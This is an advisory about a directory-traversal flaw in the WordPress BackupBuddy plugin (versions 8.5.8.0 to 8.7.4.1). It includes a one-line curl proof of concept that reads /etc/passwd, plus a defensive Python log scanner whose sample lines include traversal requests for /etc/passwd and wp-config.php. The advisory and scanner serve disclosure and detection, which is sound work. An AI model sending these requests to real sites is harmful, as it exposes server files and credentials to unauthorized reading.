BackupBuddy < 8.7.5 - Unauthenticated Arbitrary File Access
Description
The plugin is vulnerable to directory traversal, allowing unauthenticated attackers to read arbitrary files on the web server. The flaw was introduced in version 8.5.8.0.
Proof of Concept
Install BackupBuddy v8.5.8.0 through v8.7.4.1, then request (assuming the plugin's local backup path is set to something like /var/www/html/):
curl 'https://example.com/wp-admin/admin-post.php?local-download=../../../etc/passwd&local-destination-id=0'
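As an added defensive example (not part of this advisory and not code from the BackupBuddy project), the script below scans constructed web-server access-log lines for requests to admin-post.php whose local-download parameter still contains a parent-directory or path-separator component after URL decoding. The log lines are constructed, and the rule assumes a legitimate local-download value is a bare backup file name.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not taken from the advisory or any real site).
SAMPLE_LOG = """\
203.0.113.10 - - [06/Sep/2022:10:00:01 +0000] "GET /wp-admin/admin-post.php?local-download=../../../etc/passwd&local-destination-id=0 HTTP/1.1" 200 2048 "-" "curl/7.81.0"
203.0.113.11 - - [06/Sep/2022:10:00:02 +0000] "GET /wp-admin/admin-post.php?local-download=%2e%2e%2f%2e%2e%2fwp-config.php&local-destination-id=0 HTTP/1.1" 200 3001 "-" "curl/7.81.0"
198.51.100.5 - - [06/Sep/2022:10:00:03 +0000] "GET /wp-admin/admin-post.php?local-download=backup-2022-09-06.zip&local-destination-id=0 HTTP/1.1" 200 1048576 "-" "Mozilla/5.0"
198.51.100.6 - - [06/Sep/2022:10:00:04 +0000] "GET /wp-login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Common log format: client, identity, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def _fully_decode(value: str, rounds: int = 3) -> str:
    # Decode repeatedly so percent-encoded and double-encoded values are compared
    # in the same literal form; stop once decoding no longer changes the string.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(filename: str) -> bool:
    # Assumption: a legitimate value is a bare backup file name, so any directory
    # separator or ".." segment after decoding is treated as traversal.
    name = _fully_decode(filename).replace("\\", "/")
    return "/" in name or ".." in name.split("/")

def find_suspicious(log_text: str) -> list[dict]:
    # Return one record per request whose local-download value looks like traversal.
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-admin/admin-post.php"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("local-download", []):
            if is_traversal(value):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": m.group("status"),
                             "local_download": _fully_decode(value)})
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request is the signal that the file was actually served, which is what distinguishes a successful read from a blocked probe.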
Classification
Type
TRAVERSAL
Miscellaneous
Original Researcher
Lew Ayotte & Timothy Jacobs
Submitter
iThemes
Verified
Yes
Timeline
Publicly Published
2022-09-06
Added
2022-09-07
Last Updated
2022-09-07